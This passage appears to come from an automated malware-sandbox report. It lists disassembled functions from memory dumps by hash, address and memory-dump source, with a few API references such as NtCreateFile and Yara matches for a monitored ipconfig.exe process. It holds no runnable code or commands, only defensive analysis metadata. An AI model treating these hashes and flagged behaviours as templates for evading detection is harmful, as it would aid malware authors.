                      • Instruction ID: a9dc1bf1c16e8ceba886c9a70e3b091c195be02759e1c0784715b3ae59f1aa7a
                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                      • Instruction Fuzzy Hash: FAE08C319006809FCF12DB48CA50F5EBBF6FF84B00F140408A5095F720C724EC00CB00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0163AAB0, Relevance: .0, Instructions: 12COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                      • Instruction ID: 927f33e2fa5deae2046d488497613c79400f2f018439fbf096b42fcc38c14f8e
                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                      • Instruction Fuzzy Hash: DCD0C935352980CFD617CB4CC954B0533A4FB44B40FC50490E940CB722E72CD940CA00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016535A1, Relevance: .0, Instructions: 12COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                      • Instruction ID: bd5e8e638c52f2ecc5eaf2578ed34defc96362c34a171c390ff41e315ae68777
                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                      • Instruction Fuzzy Hash: 99D0A9314011819AEB82AB24CA387683BB2BF00B8CF58306988030EB52C33A8A0AC604
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0162DB40, Relevance: .0, Instructions: 11COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                      • Instruction ID: 7dbee2969f4053718137fa957fd7199414d8e1ef3c77e98f1d66b600b571f8d0
                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                      • Instruction Fuzzy Hash: C2C08C70280A11ABEB222F20CD02B403AA1BB10B02F4400A0A300DA0F0DF78D801EA00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016AA537, Relevance: .0, Instructions: 11COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                      • Instruction ID: 2f7d4568ad6095e056e5bc80b47cdca1b2b6f7fc4f4d5650ed5c2203a5ad65b2
                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                      • Instruction Fuzzy Hash: 8FC01232080248BBCB226F81CC00F067F2AEBA4B60F008014BA080B5608632E970EA88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01643A1C, Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                      • Instruction ID: 42d546f33d33bde5ae5a56cdc1bf779854b7eed7089a962814f6638ec3196db5
                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                      • Instruction Fuzzy Hash: 86C04C32180648BBC7126E45DD01F557B6AE7A4B60F154025B6040A5618976ED61D59C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0162AD30, Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                      • Instruction ID: cc5e1e7bd2b32c7ef4ad752f7b2eb433703fd619be59dd81c5033bbd6af65b30
                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                      • Instruction Fuzzy Hash: 26C08C32080248BBC712AA45CD00F117B2AE7A0B60F000020F6040A6618A32E860D588
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016376E2, Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                      • Instruction ID: 9e0ca016e1dc891b630efe16394c83fd2108061da7d4e98304f8b616548ba18c
                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                      • Instruction Fuzzy Hash: 57C08CB01411805BEB2A970CCE30B303A91AB49608F88019CEB01296A3C368A802D208
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016536CC, Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                      • Instruction ID: 873e1a32259812205de4aa9e6b9506a031bbd8d8287174eb442229629daabc80
                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                      • Instruction Fuzzy Hash: 77C02B70150440FBD7152F30CD01F157254F700F61F64035C7220456F0DE289C00E104
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01647D50, Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                      • Instruction ID: 9263b7b35dc5c96dccd475275d5197581f661376c0bde7fb83e4afc9ffab3c56
                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                      • Instruction Fuzzy Hash: 49B092363119408FCF16DF28C480B1533E4FB44A40B8400D0E400CBA21D329E8008900
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01652ACB, Relevance: .0, Instructions: 5COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                      • Instruction ID: b19373cefe9989480268cb850507d9644d7f1f7b3d8cb5f47c9a85409e88019f
                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                      • Instruction Fuzzy Hash: 41B092328104418BCF06AB40CA10B197332AB40650F0544949002279208229AC01CA50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669950, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4daa18d86fb035e80cf578624b0c123ebf7a0bf41404a5abc4612d15e4f73d78
                      • Instruction ID: 6ba179e8db29523badb7aaa0d7a0992a4c8d92bb3cf3271b48836704a1291a8e
                      • Opcode Fuzzy Hash: 4daa18d86fb035e80cf578624b0c123ebf7a0bf41404a5abc4612d15e4f73d78
                      • Instruction Fuzzy Hash: DA9002A120140403E14069994C056070109ABD0342F51C411A2055555ECA698C517175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016699D0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed9f1a997581a26454cf7ed05b3a8225f832c4a1926b10968ed7a6c9ca5de342
                      • Instruction ID: 1df0e60ac55d9a0ad12bd007528b9fde91f7c1774b666385966e587e532da214
                      • Opcode Fuzzy Hash: ed9f1a997581a26454cf7ed05b3a8225f832c4a1926b10968ed7a6c9ca5de342
                      • Instruction Fuzzy Hash: 6D9002A121100042E104659948057070149ABE1241F51C412A2145554CC5698C616165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0166B040, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 001244e9d65371d23a2ac804870c8b91f8101baecda47feaa2d94b3a668cecff
                      • Instruction ID: 2d4ebce7e9dea323dba25b777313216d9f0758877e90b675a450ef6e80612011
                      • Opcode Fuzzy Hash: 001244e9d65371d23a2ac804870c8b91f8101baecda47feaa2d94b3a668cecff
                      • Instruction Fuzzy Hash: BB9002A1601140435540B5994C054075119BBE1341391C521A0445560CC6A88855A2A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669820, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a96636a707fb6d01c0d542704a87c57d1e6511ed273dea0c030bcedf81ca7dd0
                      • Instruction ID: c2bd6a9db21e24cd9d171b2942eadd1609406e8e9b40e4aff7da2aa5bb5f1d80
                      • Opcode Fuzzy Hash: a96636a707fb6d01c0d542704a87c57d1e6511ed273dea0c030bcedf81ca7dd0
                      • Instruction Fuzzy Hash: 0A90027124100402E14175994805607010DBBD0281F91C412A0415554EC6958A56BAA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016698A0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 403640f1091aa97e797e8c0007ba30bcff8e61a2b0895bd8d6e79e4e75b0be32
                      • Instruction ID: 6ee87e913fdd82fbeb488262bbbd788cfc76aad530361b29b81b60ebb3757911
                      • Opcode Fuzzy Hash: 403640f1091aa97e797e8c0007ba30bcff8e61a2b0895bd8d6e79e4e75b0be32
                      • Instruction Fuzzy Hash: DD90026130100402E10265994815607010DEBD1385F91C412E1415555DC6658953B172
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669B00, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 049e64242d50935beb68ec01fa980c84607a84b72ac3e8f550051bf3a68a8c83
                      • Instruction ID: 136f0786caa02370e09b0ea31dfec39aa428624a96d036dca490d7e8f2fbfa12
                      • Opcode Fuzzy Hash: 049e64242d50935beb68ec01fa980c84607a84b72ac3e8f550051bf3a68a8c83
                      • Instruction Fuzzy Hash: E490026124100802E14075998815707010AEBD0641F51C411A0015554DC656896576F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0166A3B0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be8709d80826463bcd7d9b77fb722a9d96e4f098873482dfc745ea01b5263c94
                      • Instruction ID: e425114436a612044864edf274967c2973fb880d294440043ba2b99cf554982b
                      • Opcode Fuzzy Hash: be8709d80826463bcd7d9b77fb722a9d96e4f098873482dfc745ea01b5263c94
                      • Instruction Fuzzy Hash: 6A90027120144002E1407599884560B5109BBE0341F51C811E0416554CC6558856A261
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669A10, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89f83bdce8981c83f8454a9ebaf35fe3a51da42ded94bce675abb5dc3bb1b273
                      • Instruction ID: 7a1523b8f387751be29d0b0477bf27080b6dcc561c7a401d9b308ab465d27f71
                      • Opcode Fuzzy Hash: 89f83bdce8981c83f8454a9ebaf35fe3a51da42ded94bce675abb5dc3bb1b273
                      • Instruction Fuzzy Hash: 2990027120140402E10065994C097470109ABD0342F51C411A5155555EC6A5C8917571
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669A80, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d8cbd23a0031658d41a83a7b3e771ea789c0e431c6dfedbf5f5edc9121f992fe
                      • Instruction ID: ae272c195b4efb2b3d7da921e11de43ddab22d6be2fb4b1919f0c9360381fff4
                      • Opcode Fuzzy Hash: d8cbd23a0031658d41a83a7b3e771ea789c0e431c6dfedbf5f5edc9121f992fe
                      • Instruction Fuzzy Hash: 5E90026120144442E14066994C05B0F4209ABE1242F91C419A4147554CC95588556761
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669560, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 942e4601b8628dbb246315da614f6f932afbd2a9aae7905a45fa3daf0aada173
                      • Instruction ID: b0dc06cf9073030efb1981ab098b8f37513667faa4ce6f01945e57b350e797e7
                      • Opcode Fuzzy Hash: 942e4601b8628dbb246315da614f6f932afbd2a9aae7905a45fa3daf0aada173
                      • Instruction Fuzzy Hash: 14900265221000021145A9990A0550B0549BBD6391391C415F1407590CC66188656361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669520, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ebe9fbea620b6e4bd59d04cfb691e29c2457523597f52fbf66df8e4d9747071
                      • Instruction ID: ba22ce99068caf5ed34afa89a05c33f7da10a7fcedf942b41aef759ebbbd204b
                      • Opcode Fuzzy Hash: 2ebe9fbea620b6e4bd59d04cfb691e29c2457523597f52fbf66df8e4d9747071
                      • Instruction Fuzzy Hash: FF9002E1201140925500A6998805B0B4609ABE0241B51C416E1045560CC5658851A175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0166AD30, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 97bae916f2294ba0f79cf4aeae623d68a87b51d266df2cdf665e65714622061f
                      • Instruction ID: d8711bc65aad8bbafb4edd42bfc9fb78270a05c3cd363902417aaeafd24a3c19
                      • Opcode Fuzzy Hash: 97bae916f2294ba0f79cf4aeae623d68a87b51d266df2cdf665e65714622061f
                      • Instruction Fuzzy Hash: 62900271A0500012A14075994C15647410ABBE0781B55C411A0505554CC9948A5563E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016695F0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d2c5f4bc6f0463aa7d0664f90156e6c1a6eee0f9d033c3b9d2a474e686b780a
                      • Instruction ID: ee32f15cf5019380e12c4f02fc1b004edbd94eef0059f1696ce34a8d36ed105e
                      • Opcode Fuzzy Hash: 9d2c5f4bc6f0463aa7d0664f90156e6c1a6eee0f9d033c3b9d2a474e686b780a
                      • Instruction Fuzzy Hash: E490027120100802E10465994C056870109ABD0341F51C411A6015655ED6A588917171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669760, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: afa9cd5a132163cb6892d9898eae0a92f49e2a5869be02b1827806dad6e04de2
                      • Instruction ID: e77730862b128e4a34311217fe11c4a612a0a485cf9e71d40ac4e4965fc7e587
                      • Opcode Fuzzy Hash: afa9cd5a132163cb6892d9898eae0a92f49e2a5869be02b1827806dad6e04de2
                      • Instruction Fuzzy Hash: 6C90027120100403E100659959097070109ABD0241F51D811A0415558DD69688517161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0166A770, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 17088131aa908bc81fe215d86acafc7c0fca916b2be5c4b32d3f6f2830ee9dd5
                      • Instruction ID: c114e22093fd74b4ae79cce1f885ff0fcdd6b3280249401bf55a2e2b63cce0fe
                      • Opcode Fuzzy Hash: 17088131aa908bc81fe215d86acafc7c0fca916b2be5c4b32d3f6f2830ee9dd5
                      • Instruction Fuzzy Hash: 7A90027520504442E50069995C05A870109ABD0345F51D811A041559CDC6948861B161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669770, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9e1ff4bdfb3b90c048b36313c9a2dabf108cbbb3558a0bb6168db9173ceb647e
                      • Instruction ID: 085d2b9570adca5e25688942cf4448d428b977d034bcf4b5c73a25b6e458daa2
                      • Opcode Fuzzy Hash: 9e1ff4bdfb3b90c048b36313c9a2dabf108cbbb3558a0bb6168db9173ceb647e
                      • Instruction Fuzzy Hash: 1590026120504442E10069995809A070109ABD0245F51D411A1055595DC6758851B171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669730, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 00f9cb5cc31f56163aa52d26c548cb9fa575ac8fc5a04b883242a65e45e54006
                      • Instruction ID: b490b46e5f5d9d7f310833fbec1908b9fbb0633e324dbed88ea8e2999e376ec2
                      • Opcode Fuzzy Hash: 00f9cb5cc31f56163aa52d26c548cb9fa575ac8fc5a04b883242a65e45e54006
                      • Instruction Fuzzy Hash: 0D90026160500402E140759958197070119ABD0241F51D411A0015554DC6998A5576E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0166A710, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b5a83f4986ae6d6511357da09b197c21ff48805c82bd945c5086f3a20e1dd4d1
                      • Instruction ID: e57b976ab4f4ef2b0a6be5878db42f3be74a310ea63096c585dc2a8b168e9694
                      • Opcode Fuzzy Hash: b5a83f4986ae6d6511357da09b197c21ff48805c82bd945c5086f3a20e1dd4d1
                      • Instruction Fuzzy Hash: C090027130100052A500AAD95C05A4B4209ABF0341B51D415A4005554CC59488616161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669FE0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e07ac8f22ab8bd4bff436631292db202f9b1720b62437a5955a5fe7e2d9f6566
                      • Instruction ID: 6ef7b7c60f3a243c2697aeb6053367af3fb9aa233c400b9a78860d41a3498bd5
                      • Opcode Fuzzy Hash: e07ac8f22ab8bd4bff436631292db202f9b1720b62437a5955a5fe7e2d9f6566
                      • Instruction Fuzzy Hash: 5590027131114402E110659988057070109ABD1241F51C811A0815558DC6D588917162
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669650, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f721eccfda34306c5e6292594fbc7de7dbcb19529371b5b4c464e517f68420d
                      • Instruction ID: 0ad80f112b7df9724f3b08705b77f7a52bf5bbcbf7c98c1b6b075c54cd83450e
                      • Opcode Fuzzy Hash: 6f721eccfda34306c5e6292594fbc7de7dbcb19529371b5b4c464e517f68420d
                      • Instruction Fuzzy Hash: 5790027120504842E14075994805A470119ABD0345F51C411A0055694DD6658D55B6A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669610, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14b609c75a196b6290d7048baf4e5a5feb41461b07b46fb8e70ab81ace8d721b
                      • Instruction ID: 94b61ec3c8350a3219c4bbbd6ea8dceb11987acde83098931b5769adef3699c9
                      • Opcode Fuzzy Hash: 14b609c75a196b6290d7048baf4e5a5feb41461b07b46fb8e70ab81ace8d721b
                      • Instruction Fuzzy Hash: 6D90027160500802E150759948157470109ABD0341F51C411A0015654DC7958A5576E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016696D0, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50c165217588edee2cea44f3d6791ab56ad8b206accd39941aef220227cde3c3
                      • Instruction ID: 1dfa4d7e603cc2c87fdb0901613559873f9479dfa8c8bff5e9e98243c22651ad
                      • Opcode Fuzzy Hash: 50c165217588edee2cea44f3d6791ab56ad8b206accd39941aef220227cde3c3
                      • Instruction Fuzzy Hash: 8E90027120100842E10065994805B470109ABE0341F51C416A0115654DC655C8517561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669670, Relevance: .0, Instructions: 2COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction ID: 4ade4bddde16522380ddb09c9e631f1c301057152f5e53df303db9a7a9c501ce
                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                      Download Yara Rule
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016BFDFA
                      Strings
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016BFE01
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016BFE2B
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: a94b4ae3efa4aa942f7a996a221185dbeef3a545bd5e26f1d8bbdea9500b5b4d
                      • Instruction ID: f953a75abab84bd5648f5257beb2f420212c023a173cc5aea62bd82349f8ecad
                      • Opcode Fuzzy Hash: a94b4ae3efa4aa942f7a996a221185dbeef3a545bd5e26f1d8bbdea9500b5b4d
                      • Instruction Fuzzy Hash: 48F0C272200602BBE6211A45DC42EB3BB6AEB45B30F240218F628561E1DA62B87087E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Analysis Process: ipconfig.exe PID: 6536 Parent PID: 3352 ipconfig.exeCOMMON

                      Executed Functions

                      Function 02C7A3B2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73filenativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02C74BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C74BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02C7A3AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID: .z`
                      • API String ID: 823142352-1441809116
                      • Opcode ID: 04cd7c941d2ea1eb2635a9d10489f0c44c8649a881fbdc3a21aadfd6469b9bb1
                      • Instruction ID: 6bb0bf198fcc6ee472e1009dc207e8f044e12e15bbe73ddf367b1be669ea79e7
                      • Opcode Fuzzy Hash: 04cd7c941d2ea1eb2635a9d10489f0c44c8649a881fbdc3a21aadfd6469b9bb1
                      • Instruction Fuzzy Hash: BD11A4B2214108AFDB08DF99EC81DEB77ADEF8C754B158649FA1DD7240D631E8118BB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02C7A35A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02C74BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C74BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02C7A3AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID: .z`
                      • API String ID: 823142352-1441809116
                      • Opcode ID: c74b965103839cb60f30ae83599cb12fb90ae248e942a4c9b27c0e80c5f6dfc0
                      • Instruction ID: 9a6d86679335536327550540b76c989dcd1585696b266ec5ee9c4bda8c0575fa
                      • Opcode Fuzzy Hash: c74b965103839cb60f30ae83599cb12fb90ae248e942a4c9b27c0e80c5f6dfc0
                      • Instruction Fuzzy Hash: 5C01B2B2205108BFCB18DF98DC95EEB77A9AF8C754F158248FA1DE7241C631E811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

